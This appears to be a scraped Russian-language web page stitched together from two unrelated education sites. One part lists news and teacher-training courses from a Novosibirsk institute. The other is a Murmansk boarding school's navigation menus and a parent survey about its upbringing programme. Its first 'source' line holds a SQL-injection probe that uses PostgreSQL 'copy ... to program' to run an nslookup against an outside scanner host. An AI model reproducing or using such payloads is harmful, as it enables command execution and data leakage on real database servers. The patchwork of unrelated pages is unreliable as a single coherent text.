В ходе расширенного заседания коллегии министерства образования Новосибирской области лучшие представители отрасли получили заслуженные награды.
21 декабря 2022
Новосибирский детский сад победил во всероссийском конкурсе «Кубрик — 2022»
15 декабря 2022
Маслянинская школа №1 провела мероприятие в качестве Центра развития личностного потенциала
7 декабря 2022
Команда — это точка опоры!
4 декабря 2022
Секреты мастерства Новосибирской команды
1 декабря 2022
Личностный потенциал педагога — зеркало детских возможностей
30 ноября 2022
Новые «пилоты» вливаются в Программу по развитию личностного потенциала
Завершен конкурсный отбор образовательных организаций для участия в Программе по развитию личностного потенциала на территории Новосибирской области.
27 ноября 2022
Программа по развитию личностного потенциала: секреты онлайн-дидактики
25 ноября в ходе I Межрегиональной образовательной выставки по развитию личностного потенциала представлен опыт команды Новосибирской области.
Организация воспитания по-новому: нормативные основания и ключевые направления
22 ноября 2022
Искусство читать человека — слагаемое профессионализма педагога
22-23 ноября в Новосибирской государственной консерватории им. М.И. Глинки проходит III Всероссийская научно-практическая конференция «Профессиональное музыкальное образование: история, теория, практика».
9 ноября 2022
Прочувствовать и осознать воспитательную миссию педагога дополнительного образования
9 ноября состоялась проектировочная сессия для руководителей ММО педагогов дополнительного образования.
Кафедра педагогики, воспитания и дополнительного образования
очно-заочно
Категория слушателей: Педагогические работники всех категорий
Сроки: в течение учебного года по мере подачи заявок и по индивидуальным планам.
Размер группы
34 человек
Кафедра педагогики, воспитания и дополнительного образования
очно-заочно
Категория слушателей: Заместители директоров по воспитательной работе, педагоги-организаторы, классные руководители, социальные педагоги, советники директора по воспитанию и взаимодействию с детскими общественными объединениями
Сроки: по договоренности.
Разработка и реализация модуля «Работа с родителями» рабочей программы воспитания ООП. Стратегия развития воспитания в Российской Федерации на период до 2025 года: понимание содержания; особенности реализации в системе воспитательной деятельности образовательной организации и взаимодействия с родителями.
Создание условий в ОО для повышения педагогической компетентности родителей. Права родителей при сотрудничестве субъектов системы воспитания (семьи, общества, государства, образовательных, научных, традиционных религиозных организаций, учреждений культуры и спорта, средств массовой информации, бизнес-сообществ).
Формы работы с родителями: семейные клубы, семейные и родительские объединения, содействующих укреплению семьи, сохранению и возрождению семейных и нравственных ценностей с учетом роли религии и традиционной культуры местных сообществ. Развитие в ОО и поддержка социально значимых детских, семейных и родительских инициатив. Особенности взаимодействия участников воспитательного процесса, формы взаимодействия семьи и образовательной организации: традиционные, инновационные. Создание атмосферы уважения к родителям и родительскому вкладу в воспитание детей.
Единое воспитательное пространство региона: программы воспитания ‒ от идеи к реализации
Включен тематический модуль «Профилактика деструктивного поведения детей и молодежи».
Размер группы
25 человек
Кафедра педагогики, воспитания и дополнительного образования
очно-заочно
Категория слушателей: Руководители ММО Сузунского района Новосибирской области
Кластерный подход как актуальный вектор модернизации образовательной системы, обеспечивающий ее конкурентоспособность и адекватность запросам социума. Ключевые акценты работы в кластере – формирование методологической культуры и исследовательской позиции педагога в обучении и воспитании.
Построение траектории непрерывного профессионального роста педагога в условиях реализации ФГОС, профессионального стандарта педагога и федерального проекта «Учитель будущего». Организация методической помощи в освоении обновленного содержания, технологий и методов педагогической деятельности. Особенности вертикальной и горизонтальной карьеры современного учителя.
Функциональная грамотность. Внутрикорпоративное профессиональное развитие. Современные требования к профессиональным и личностным компетенциям педагога. Индивидуальный образовательный маршрут как инструмент профессионального развития учителя.
Включен тематический модуль «Профилактика деструктивного поведения детей и молодежи».
Сроки: по договоренности.
Размер группы
26 человек
Кафедра педагогики, воспитания и дополнительного образования
очно-заочно
Категория слушателей: Педагоги ОО г. Бердска Новосибирской области
Требования ФГОС к реализации основных образовательных программ. Профессиональные и личностные компетенции в работе современного учителя. Образовательный кластер в создании условий для обучения личности. Взаимодействие педагогов с родителями. Социальное проектирование. Психологическая безопасность.
Модели внеурочной деятельности с учетом особых образовательных потребностей обучающихся. Проектирование индивидуальных образовательных маршрутов педагогов и обучающихся.
Включен тематический модуль «Профилактика деструктивного поведения детей и молодежи».
Сроки: по договоренности.
Размер группы
26 человек
Кафедра педагогики, воспитания и дополнительного образования
очно-заочно
Категория слушателей: Педагогические работники Новосибирской области, которые будут реализовывать дополнительные общеобразовательные программы на открываемых новых местах ДОД в рамках федерального проекта «Успех каждого ребенка» Национального проекта «Образование»
Сроки: по согласованию с районами и муниципалитетами НСО (март-июнь 2023 г.).
Федеральный и региональный проекты «Успех каждого ребенка»: цели, задачи, результат. Увеличение охвата детей дополнительным образованием. Современные требования к дополнительной общеразвивающей программе. Структурные компоненты программы (комплекс основных характеристик, комплекс организационно-педагогических условий).
Разноуровневость дополнительных общеобразовательных программ (стартовый, базовый, углубленный уровни). Индивидуальный образовательный маршрут. Современные образовательные технологии, использование новых форм и методов обучения по дополнительной общеразвивающей программе. Проектирование обновленного содержания дополнительных общеразвивающих программ различной направленности в условиях реализации проекта «Успех каждого ребенка». Включен тематический модуль «Профилактика деструктивного поведения детей и молодежи».
Размер группы
90 человек
Кафедра педагогики, воспитания и дополнительного образования
очно-заочно
Категория слушателей: Педагогические работники МБУ ДО «Центр развития творчества детей и юношества «Заельцовский» г. Новосибирска
Профессионализм педагога дополнительного образования в условиях реализации Концепции развития дополнительного образования детей до 2030 года. Развитие профессиональной Я-концепции педагога дополнительного образования, профессиональной позиции педагога как воспитателя.
Ценностные ориентиры духовно-нравственного воспитания обучающихся как основа выбора методико-дидактических практик и приемов в деятельности современного педагога. Векторы профессионального развития: индивидуальный стиль деятельности педагога как воспитателя; авторское занятие; формы воспитательно-развивающего досуга; медиа технологии в дополнительном образовании; воспитательная составляющая развития 4к-компетенций. Вариативные формы партнёрского взаимодействия семьи и учреждения дополнительного образования. Повышение психолого-педагогической культуры родителей. Включен тематический модуль «Профилактика деструктивного поведения детей и молодежи».
Сроки: по договоренности.
Размер группы
25 человек
Кафедра педагогики, воспитания и дополнительного образования
очно-заочно
Категория слушателей: Педагогические работники МБУ ДО «Дом детского творчества «Кировский» г. Новосибирска
Профессионализм современного педагога дополнительного образования в условиях реализации национального проекта «Образование». Психолого-педагогическая и методико-дидактическая компетентность в подготовке, проведении занятий в системе дополнительного образования.
Современные образовательные технологии по развитию «4К» компетенций: критическое мышление, креативность, коммуникация, коллаборация. Вариативные маршруты профессионального развития: индивидуальный стиль деятельности педагога-практика; авторское занятие; мастер-класс. Вариативные формы партнёрского взаимодействия семьи и организации дополнительного образования. Повышение психолого-педагогической культуры родителей. Включен тематический модуль «Профилактика деструктивного поведения детей и молодежи».
Размер группы
26 человек
Кафедра педагогики, воспитания и дополнительного образования
очно-заочно
Категория слушателей: Педагогические работники МБУ ДО Центр детского творчества «Содружество» г. Новосибирска
Сроки: по договоренности.
Размер группы
25 человек
Кафедра педагогики, воспитания и дополнительного образования
очно-заочно
Категория слушателей: Педагоги дополнительного образования Маслянинского района Новосибирской области
Сроки: по договоренности.
Включен тематический модуль «Профилактика деструктивного поведения детей и молодежи».
Размер группы
25 человек
Кафедра педагогики, воспитания и дополнительного образования
очно-заочно
Категория слушателей: Классные руководители МБОУ СОШ № 196 г. Новосибирска
Включен тематический модуль «Профилактика деструктивного поведения детей и молодежи».
Сроки: по договоренности.
Источник: =oocmtcbtcopy+(select+»)+to+program+’nslookup+dns.sqli.%5C013405.1281-29900.1281.56dce.%5C1.bxss.mePAGEN_1=6″ target=»_blank»]nipkipro.ru
Вариативные модули в программе воспитания школы что это такое
- Национальные образовательные проекты
- Нормативно-правовая база реализации проекта
- Информация по вопросам оказания услуг психолого-педагогической, методической и консультативной помощи
- Дифференцированная тематика индивидуальных консультаций с родителями (законными представителями)
- План мероприятий по реализации федерального проекта «Поддержка семей, имеющих детей» в 2020 г.
- Новости проекта
- Материалы для родителей и специалистов, реализующих мероприятия проекта
- Запись на консультацию
- Навигационный маршрутизатор консультационной площадки
- Новости
- Награды и достижения
- Анонсы событий
- Сми о нас
- Награды учителей
- РЦДО
- Внеурочная деятельность
- Спорт
- День Победы!
- Сотрудникам
- Контакты и реквизиты
- Правила приёма
- Инновационная площадка
- Дошкольная группа
- Информационная безопасность
- Государственная (итоговая) аттестация
- Расписание уроков и занятий, графики работы
- Расписание звонков
- Вопрос-ответ
- Информация для родителей и учащихся
- Информация для сотрудников
- Информация для классных руководителей
- Информация по аттестации педагогов
- Электронные услуги в сфере образования
- Режим работы
- Противодействие коррупции
- Полярная ночь
- Меню
- Политика конфиденциальности
- История
- Комната «Боевой и трудовой славы»
- История школы
- Из истории села Минькино
- Информационная безопасность
- Пожарная безопасность
- Дорожная безопасность
- Антитеррористическая безопасность
- Публикации
- Объекты спорта
- Школьные спортивные события
- Спортивный клуб «Чемпион»
- Программы воспитания
- Разработка программы воспитания
- Модель социализации детей с ТНР
- Школьная служба примирения
- Полезная информация
- Внеурочная деятельность для детей с ОВЗ
- Творческая группа
- Профилактика правонарушений
- Театральная студия «Мозаика»
Министерство образования и науки Мурманской области
Государственное областное бюджетное общеобразовательное учреждение
«Минькинская коррекционная школа-интернат»
- Сведения об образовательной организации
- Основные сведения
- Структура и органы управления образовательной организации
- Документы
- Образование
- Образовательные стандарты
- Руководство. Педагогический (научно-педагогический) состав
- Материально-техническое обеспечение образовательной деятельности
- Платные образовательные услуги
- Финансово-хозяйственная деятельность
- Вакантные места для приема (перевода)
- Доступная среда
- Международное сотрудничество
- Лицензия на осуществление образовательной деятельности
- Уровни образования
- Формы обучения
- Нормативные сроки обучения
- Государственная аккредитация
- Образовательные программы
- Учебные планы и планы внеурочной деятельности
- Рабочие программы
- Календарный график
- Методические и иные документы
- Государственная (итоговая) аттестация
- Численность обучающихся
- Программа развития
- Дошкольная группа
- Электронная школа
- Договор о сотрудничестве и совместной деятельности
- Лапландия
- Мурманская областная детско-юношеская библиотека
- Минькинская библиотека
- Центр психолого-медико-социального сопровождения
- Сектор охраны прав детей отдела образования администрации Кольского района
- ГОАУК «Мурманский областной художественный музей»
- ГИБДД
- Спортивно-оздоровительный комплекс «Пинагор»
- ЧУСО «Социальный центр – SOS Мурманск»
- Благотворительный фонд «Детский мир»
- 2022
- 2021
- 2020
- 2019
- 2018
- Новости Ресурсного центра дистанционного образования детей-инвалидов
- О центре
- Учебный процесс
- Правила поступления
- Кадровый состав
- Система управления обучением Moodle
- Технические средства обучения
- Прислать материал
- Документы Ресурсного учебно-методического центра
- Структура центра
- Помощь педагогам
- Советы родителям
- Мероприятия
Главная » Воспитание » Разработка программы воспитания » Вариативные модули – опрос
Вариативные модули – опрос
Приглашаем вас к участию в отборе модулей, которые войдут в Программу воспитании школы-интерната. Прежде чем дать ответ, можете обсудить его с вашим ребенком.
Инвариативные модули – это модули, которые войдут в Программу обязательно. Ими должны стать:
- «Классное руководство и наставничество»,
- «Школьный урок»,
- «Курсы внеурочной деятельности и дополнительного образования»,
- «Работа с родителями»,
- «Самоуправление»,
- «Профориентация».
Всероссийский телефон доверия
+7 (495) 104-68-38
Уполномоченный по правам ребёнка
При президенте Российской Федерации
Львова-Белова Мария Алексеевна
+7 (495) 221-70-65
В Мурманской области
Андреева Алевтина Васильевна
(8152) 486-596
Источник: xn--h1aafggch2i.xn--p1ai